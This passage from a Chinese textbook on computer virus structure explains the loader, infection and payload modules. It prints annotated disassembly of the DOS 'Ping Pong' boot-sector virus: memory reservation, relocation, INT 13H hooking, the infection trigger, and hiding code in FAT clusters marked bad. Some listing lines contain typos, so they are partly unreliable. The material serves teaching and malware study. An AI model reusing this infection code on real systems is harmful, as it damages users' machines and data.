67、;　　引導(dǎo)模塊的功能是將病毒程序引入內(nèi)存并使其后面的兩個模塊處于激活狀態(tài)，感染模塊的功能是，在感染條件滿足時把病毒感染到所攻擊的對象上；表現(xiàn)( 破壞) 模塊的功能是，在病毒發(fā)作條件( 表現(xiàn)、破壞條件) 滿足時，實施對系統(tǒng)的干擾和破壞活動。</p><p>　　3.2 病毒的引導(dǎo)部分</p><p>　　3.2.1 病毒的引導(dǎo)模塊和引導(dǎo)機制</p><p>　　引導(dǎo)模

68、塊的主要作用是將靜態(tài)病毒激活，使之成為動態(tài)病毒。動態(tài)病毒是指要么已進入內(nèi)存處于活動狀態(tài)的病毒，要么能通過調(diào)用某些中斷而獲得運行權(quán)，從而它就可以隨心所欲。</p><p>　　病毒程序的加載分為兩個步驟：一是系統(tǒng)加載過程;二是病毒附加的加載過程。系統(tǒng)加載過程通常讀入病毒程序的引導(dǎo)部分,并將系統(tǒng)控制權(quán)轉(zhuǎn)交病毒引導(dǎo)程序。病毒引導(dǎo)程序一般都是病毒附加的加載過程,它主要用來完成對病毒程序的完整讀入和安裝。病毒程序選擇的加載

69、點、目標多是計算機的固有弱點或軟件系統(tǒng)的輸入節(jié)點。</p><p>　　具體的說，病毒的加載過程，主要有3個步驟組成：</p><p><b>　　開辟內(nèi)存空間</b></p><p>　　病毒要起作用，就必須駐留內(nèi)存，要想駐留就必須開辟內(nèi)存空間或直接覆蓋系統(tǒng)占用的部分內(nèi)存。</p><p><b>　　病毒體

70、定位和駐留</b></p><p>　　病毒進入內(nèi)存后即脫離原載體程序，在內(nèi)存駐留區(qū)域進行重定位，而且對內(nèi)存中的病毒程序采取一定的保護措施，使之不會被正常程序覆蓋掉。病毒駐留內(nèi)存后，要對內(nèi)存中的病毒程序設(shè)定某種激活方式，使之在適當?shù)臅r候能取得運行權(quán)，這就必須使病毒的有關(guān)組成單元取代或擴充系統(tǒng)的原有功能，包括改寫中斷向量，設(shè)置激活、感染、表現(xiàn)( 破壞) 條件，初始化內(nèi)部各數(shù)據(jù)單元等。在取得控制權(quán)后，病毒

71、依據(jù)自身條件的制約，在適當?shù)臈l件下進行感染和破壞。</p><p><b>　　3.3恢復(fù)系統(tǒng)功能</b></p><p>　　為保證病毒駐入的系統(tǒng)能繼續(xù)有效工作，提高隱蔽性，大多數(shù)病毒程序?qū)⒉《酒茐牡挠嘘P(guān)信息轉(zhuǎn)儲于其他特定單元，允許系統(tǒng)通過病毒程序使用。</p><p>　　3.3.1 病毒引導(dǎo)部分舉例</p><p>

72、;　　例：“小球”病毒的引導(dǎo)部分的程序片段</p><p>　　病毒的引導(dǎo)程序主要進行以下操作：</p><p>　　修改內(nèi)存可用空間的大小，病毒首先在內(nèi)存的最高端預(yù)留出2 kB 存儲空間；</p><p>　　將病毒的引導(dǎo)程序模塊及有關(guān)參數(shù)從0000∶7C00H 處移到該區(qū)域中，然后把控制轉(zhuǎn)向該區(qū)域的病毒程序處開始執(zhí)行；</p><p>　

73、　在標為“壞”磁盤扇區(qū)中裝有病毒程序的另一部分，將其裝入并連接到病毒引導(dǎo)模塊之后；</p><p>　　將原DOS 的正常引導(dǎo)程序讀入內(nèi)存中病毒程序引導(dǎo)模塊騰出來的0000∶7C00H處；</p><p>　　初始化參數(shù)，修改INT 13H 中斷向量，使它指向病毒的感染模塊的入口；</p><p>　　將控制權(quán)還給DOS 引導(dǎo)程序，開始執(zhí)行真正的系統(tǒng)的引導(dǎo)。<

74、/p><p>　　下面代碼少寫或者不寫。</p><p>　　0000∶7C00 EB1C JMP 7C1E</p><p>　　. . . . . . . . .</p><p>　　0000∶7C1E 33C0 XOR AX ，AX</p><p>　　0000∶7C20 8ED0 MOV SS，AX</p>

75、;<p>　　0000∶7C22 BC007C MOV SP，7C00</p><p>　　0000∶7C25 8ED8 MOV DS，AX</p><p>　　0000∶7C27 A11304 MOV AX，[ 0413]；[ 0413] = 內(nèi)存空間大小</p><p>　　0000∶7C2A 2D0200 SUB AX，0001；內(nèi)存總量減去2

76、kB，以防</p><p>　　0000∶7C2D A31304 MOV [ 0413]，AX；用戶程序覆蓋</p><p>　　0000∶7C30 B106 MOV CL，06；計算最高段地址</p><p>　　0000∶7C32 D3E0 SHL AX，CL</p><p>　　0000∶7C34 2DC007 SUB AX，07C0；

77、如內(nèi)存為640K，AX= 07C0</p><p>　　把病毒程序的第一部分從0000∶7C00H～0000∶7DFFH 搬到內(nèi)存高端留出的2 kB 空間中，位置為97C0∶7C00H～97C0∶7DFFH。</p><p>　　0000∶7C37 8EC0 MOV ES，AX</p><p>　　0000∶7C39 BE007C MOV SI，7C00</p

78、><p>　　0000∶7C3C 8BFE MOV DI，SI</p><p>　　0000∶7C3E B90001 MOV CX，0100</p><p>　　0000∶7C41 F3 REPZ；將[ 0000∶7C00H] →[ ES∶7C00]</p><p>　　0000∶7C42 A5 MOVSW；傳送256 個字</p>

79、<p>　　0000∶7C43 8EC8 MOV CS，AX；CS= 病毒程序段地址</p><p>　　97C0∶7C45 0E PUSH CS</p><p>　　97C0∶7C46 1F POP DS</p><p>　　97C0∶7C47 E80000 CALL 7C4A</p><p>　　97C0∶7C4A 32E4

80、XOR AH，AH</p><p>　　97C0∶7C4C CD13 I NT 13；復(fù)位磁盤</p><p>　　97C0∶7C4E 8026F87D80 AND BYTE PTR[ 7DF8]，80</p><p>　　97C0∶7C53 8B1EF97D MOV BX，[ 7DF9]；[ 7DF9] = 病毒第二部分的開始</p><p&g

81、t;　　97C0∶7C57 0E PUSH CS；邏輯扇區(qū)號</p><p>　　97C0∶7C58 58 POP AX</p><p>　　97C0∶7C59 2D2000 SUB AX，0200</p><p>　　97C0∶7C5C 8EC0 MOV ES，AX</p><p>　　97C0∶7C5E E83C00 CALL 7C9D；

82、讀病毒第二部分程序</p><p>　　97C0∶7C61 8B1EF97D MOV BX，[ 7DF9]</p><p>　　97C0∶7C65 43 I NC BX；BX= 原引導(dǎo)記錄所在邏輯扇區(qū)號</p><p>　　97C0∶7C66 B8C0FF MOV AX，F(xiàn)FC0；FFC0 + 8000 =7C00( 不計溢出)</p><p&g

83、t;　　97C0∶7C69 8EC0 MOV ES，AX</p><p>　　97C0∶7C6B E82F00 CALL 7C9D；讀原引導(dǎo)記錄到0000∶7C00H 中</p><p>　　97C0∶7C6E 33C0 XOR AX，AX</p><p>　　97C0∶7C70 A2F77D MOV [ 7DF7]，AL</p><p>　

84、　97C0∶7C73 8ED8 MOV DS，AX</p><p>　　97C0∶7C75 A14C00 MOV AX，[ 004C]</p><p>　　97C0∶7C78 8B1E4E00 MOV BX，[ 004E]；取I NT 13H 中斷向量→BX，AX</p><p>　　97C0∶7C7C C7064C00D0 MOV WORD PTR[ 4C]，7C

85、D0</p><p>　　97C0∶7C82 8C0E4E00 MOV [ 004E]，CS；改INT 13H 中斷向量為：CS∶7CD0</p><p>　　97C0∶7C86 0E PUSH CS；保留原INT 13H 中斷向量</p><p>　　97C0∶7C87 1F POP DS</p><p>　　97C0∶7C88 A32A7

86、D MOV [ 7D2A]，AX；原向量移→[ DS∶7D2A]</p><p>　　97C0∶7C8B 891E2C7D MOV [ 7D2C]，BX；段地址→[ DS∶7D2C]</p><p>　　97C0∶7C8F 8A16F87D MOV DL，[ 7DF8]</p><p>　　97C0∶7C93 EA007C0000 JMP 0000∶7C00；把控制

87、權(quán)交給原DOS 引導(dǎo)程序</p><p>　　97C0∶7C98 B80103 MOV AX，0301；寫盤模塊</p><p>　　97C0∶7C9B EB03 JMP 7CA0；</p><p>　　97C0∶7C9D B80102 MOV AX，0201；讀盤模塊</p><p>　　97C0∶7CA0 93 XCHG BX，AX<

88、;/p><p>　　97C0∶7CA1 03061C7C ADD AX ，[ 7C1C] ；[ 7C1C] = 隱藏扇區(qū)數(shù)</p><p>　　97C0∶7CA5 33D2 XOR DX，DX</p><p>　　97C0∶7CA7 F736187C DI V WORD PTR [ 7C18] ；[ 7C18] = 每道扇區(qū)數(shù)</p><p>　

89、　97C0∶7CAB FEC2 I NC DL</p><p>　　97C0∶7CAD 8AEA MOV CH，DL</p><p>　　97C0∶7CAF 33D2 XOR DX，DX</p><p>　　97C0∶7CB1 F7361A7C DI V WORD PTR[ 7C1A] ；[ 7C1A] = 磁頭數(shù)</p><p>　　97C

90、0∶7CB5 B106 MOV CL ，06</p><p>　　97C0∶7CB7 D2E4 SHL AH，CL</p><p>　　97C0∶7CB9 0AE5 OR AH，CH</p><p>　　97C0∶7CBB 8BC8 MOV CX ,AX</p><p>　　97C0∶7CBD 86E9 XCHG CL，CH</p>

91、;<p>　　97C0∶7CBF 8AF2 MOV DH，DL</p><p>　　97C0∶7CC1 8BC3 MOV AX，BX</p><p>　　97C0∶7CC3 8A16F87D MOV DL，[ 7DF8]；讀寫磁盤的子程序</p><p>　　97C0∶7CC7 BB0080 MOV BX，8000</p><p&g

92、t;　　97C0∶7CCA CD13 I NT 13</p><p>　　97C0∶7CCC 7301 JNB 7CCF</p><p>　　97C0∶7CCE 58 POP AX</p><p>　　97C0∶7CCF C3 RET</p><p>　　. . . . . . . . .</p><p>　　3.4

93、病毒的感染部分</p><p>　　3.4.1 病毒的感染模塊及感染機制</p><p>　　感染模塊主要完成病毒的動態(tài)感染，是各種病毒必不可少的模塊。各種病毒感染模塊大同小異，區(qū)別主要在于感染條件。病毒在取得對系統(tǒng)的控制權(quán)后，先執(zhí)行它的感染操作中的條件判斷模塊，判斷感染條件是否滿足(如每次打開新的文件、程序或?qū)Υ疟P進行操作時，病毒就會檢查是否為特定的文件、程序，或?qū)ふ椅募?、程序或磁盤等介

94、質(zhì)中是否有感染標記，是否為特定系統(tǒng)的時間、日期等) ；如果滿足感染條件，進行感染，將病毒代碼入宿主程序；然后再執(zhí)行其他的操作( 如執(zhí)行病毒的表現(xiàn)( 破壞) 模塊) ，最后再執(zhí)行系統(tǒng)正確的處理，這是病毒感染經(jīng)常采取的手段之一。</p><p>　　3.4.2 感染部分程序的舉例</p><p>　　例：“小球”病毒的感染部分的片段</p><p>　　在系統(tǒng)啟動過程中

95、，病毒程序的引導(dǎo)模塊完成了整個病毒程序的加載，并使得病毒程序的感染模塊處于激活狀態(tài)，在系統(tǒng)運行過程中，一旦發(fā)生了I NT 13H 中斷，病毒程序的感染模塊即被執(zhí)行，其執(zhí)行流程如圖3 .2 所示。</p><p>　　下面是“小球”病毒感染模塊和表現(xiàn)模塊的判斷程序部分，由INT 13H 指向。</p><p>　　代碼少寫，或者不寫，只要說明原理就行了，如果你完全明白他的意思也可以寫。代碼的

96、字體比正文小一號。。。。。</p><p>　　97C0∶7CD0 1E PUSH DS ；7CD0 ～7CD9H 為修改后的</p><p>　　97C0∶7CD1 06 PUSH ES ；I NT 13H 中斷服務(wù)程序</p><p>　　97C0∶7CD2 50 PUSH AX</p><p>　　97C0∶7CD3 53 PUSH B

97、X</p><p>　　97C0∶7CD4 51 PUSH CX</p><p>　　97C0∶7CD5 52 PUSH DX</p><p>　　97C0∶7CD6 0E PUSH CS</p><p>　　97C0∶7CD7 1F POP DS</p><p>　　97C0∶7CD8 0E PUSH CS</

98、p><p>　　97C0∶7CD9 07 POP ES</p><p>　　97C0∶7CDA F606F77D01 TEST BYTE PTR [7DF7] ，01；是否感染狀態(tài)</p><p>　　97C0∶7CDF 7542 JNZ 7D23</p><p>　　97C0∶7CE1 80FC02 CMP AH，02；是否讀盤操作</p

99、><p>　　97C0∶7CE4 753D JMZ 7D23</p><p>　　97C0∶7CE6 3816F87D CMP [ 7DF8] ，DL ；驅(qū)動器號是否一致</p><p>　　97C0∶7CEA 8816F87D MOV [ 7DF8] ，DL</p><p>　　97C0∶7CEE 7522 JNZ 7D12 ；不是則轉(zhuǎn)7D12

100、H</p><p>　　97C0∶7CF0 32E4 XOR AH，AH</p><p>　　97C0∶7CF2 CD1A I NT 1A ；讀時鐘計數(shù)值</p><p>　　97C0∶7CF4 F6C67F TEST DH，7F</p><p>　　97C0∶7CF7 750A JNZ 7D03</p><p>　　

101、97C0∶7CF9 F6C2F0 TEST DL ，F(xiàn)0 ；7CE1 ～7CFEH 為表現(xiàn)模塊的判斷</p><p>　　97C0∶7CFC 7 505 JNZ 7D03 ；部分是否連續(xù)兩次讀同一盤且滿足</p><p>　　97C0∶7CFE 52 PUSH DX ；整點或半點的時間條件</p><p>　　97C0∶7CFF E8B101 CALL 7EB3 ；

102、滿足條件，執(zhí)行表現(xiàn)模塊</p><p>　　97C0∶7D02 5A POP DX</p><p>　　97C0∶7D03 8BCA MOV CX，DX</p><p>　　97C0∶7D05 2B16B07E SUB DX，[ 7EB0]</p><p>　　97C0∶7D09 890EB07E MOV [ 7EB0] ，CX</p&

103、gt;<p>　　97C0∶7D0D 83EA24 SUB DX,，+ 24</p><p>　　97C0∶7D10 7211 JB 7D23</p><p>　　97C0∶7D12 800EF77D01 OR BYTE PTR [ 7DF7] ，01 ；感染狀態(tài)標志</p><p>　　97C0∶7D17 56 PUSH SI</p>

104、<p>　　97C0∶7D18 57 PUSH DI</p><p>　　97C0∶7D19 E81200 CALL 7D2E ；執(zhí)行感染模塊</p><p>　　97C0∶7D1C 5F POP DI</p><p>　　97C0∶7D1D 5E POP SI</p><p>　　97C0∶7D1E 8026F77DFE AND

105、BYTE PTR [ 7DF7] ，F(xiàn)E ；清感染狀態(tài)</p><p>　　97C0∶7D23 5A POP DX</p><p>　　97C0∶7D24 59 POP CX</p><p>　　97C0∶7D25 5B POP BX</p><p>　　97C0∶7D26 58 POP AX</p><p>　　97

106、C0∶7D27 07 POP ES</p><p>　　97C0∶7D28 1F POP DS</p><p>　　97C0∶7D29 EA1A0500C8 JMP C800∶051A ；執(zhí)行原INT 13H</p><p>　　大致過程是：讀入目標磁盤的第一扇區(qū)，并判斷是何種類型磁盤、是否已被小球病毒感染( 病毒標志為1357H)，符合條件時進行感染。首先在FAT

107、 表中找出一個未用簇，并將它標為壞簇，然后將病毒程序的第二部分寫入該簇第一扇區(qū)，把原磁盤的引導(dǎo)記錄寫入第二扇區(qū)，并把病毒程序的第一部分寫入被感染目標盤的引導(dǎo)扇區(qū)，這就完成了“小球”病毒對一個新磁盤的感染。</p><p>　　3.5 病毒的表現(xiàn)（破壞）部分</p><p>　　3.5.1 病毒的表現(xiàn)（破壞）模塊及表現(xiàn)（破壞）機制</p><p>　　表現(xiàn)( 破壞)

108、模塊主要完成病毒的表現(xiàn)或破壞功能，也可稱為病毒的載體模塊，是計算機病毒的主體模塊。它負責實施病毒的表現(xiàn)( 破壞) 動作，其內(nèi)部是實現(xiàn)病毒編寫者預(yù)定計算機病毒的結(jié)構(gòu)及作用機制破壞動作的代碼，這些破壞動作可能是破壞文件、數(shù)據(jù)，或計算機的空間效率和時間效率,使系統(tǒng)的運行變慢，干擾視頻顯示，甚至使機器運行崩潰，這是病毒為了表明自己的存在和達到自己的目的，或早或晚是一定要發(fā)作的。</p><p>　　它的發(fā)作部分應(yīng)具備兩個

109、特征：第一，程序要有一定的隱蔽性及潛伏性，因為病毒的這部分程序是非正常的處理程序，不愿意被人們發(fā)現(xiàn)它的存在；第二，病毒發(fā)作的條件性和多樣性。無論哪一種計算機病毒，都很少在未進行條件判斷之前隨意發(fā)作，通常只有在符合某種條件以后才發(fā)作。</p><p>　　病毒的觸發(fā)條件大概有以下5 種： 時間、日期作觸發(fā)條件；② 計數(shù)器作觸發(fā)條件；③ 鍵盤字符輸入作觸發(fā)條件；④ 特定文件出現(xiàn)作觸發(fā)條件；⑤ 綜合觸發(fā)條件，它決定于病

110、毒設(shè)計者的意圖。</p><p>　　計算機病毒的破壞和表現(xiàn)模塊一般分為兩個部分：一個是破壞模塊的觸發(fā)條件的判斷部分；一個是破壞功能的實施部分。觸發(fā)條件的判斷部分時刻監(jiān)視著計算機系統(tǒng)的運行環(huán)境，尋找破壞和表現(xiàn)的時刻；而破壞功能的實施部分經(jīng)常靜止不動，有的病毒甚至要潛伏一年半載，甚至三五年，視觸發(fā)條件的設(shè)計而定，一旦條件滿足，實施破壞部分被觸發(fā)，才突然發(fā)作。許多潛伏期長的惡性病毒發(fā)作的破壞作用是難以預(yù)計的。<

111、/p><p>　　和病毒的感染模塊一樣，破壞模塊可能在病毒程序第一次加載時就運行，也可能在第一次加載時只將引導(dǎo)模塊引入內(nèi)存，以后再通過某些中斷機制觸發(fā)才運行。破壞機制在設(shè)計原則上也與感染機制基本相同，也是通過修改某一中斷向量入口地址，使該中斷向量指向病毒程序的破壞模塊。因為病毒表現(xiàn)( 破壞) 模塊的觸發(fā)大都與系統(tǒng)時間有關(guān)，所以病毒常用到的系統(tǒng)中斷，除了病毒傳播利用的INT 13H、INT 21H 外，還有與系統(tǒng)時間或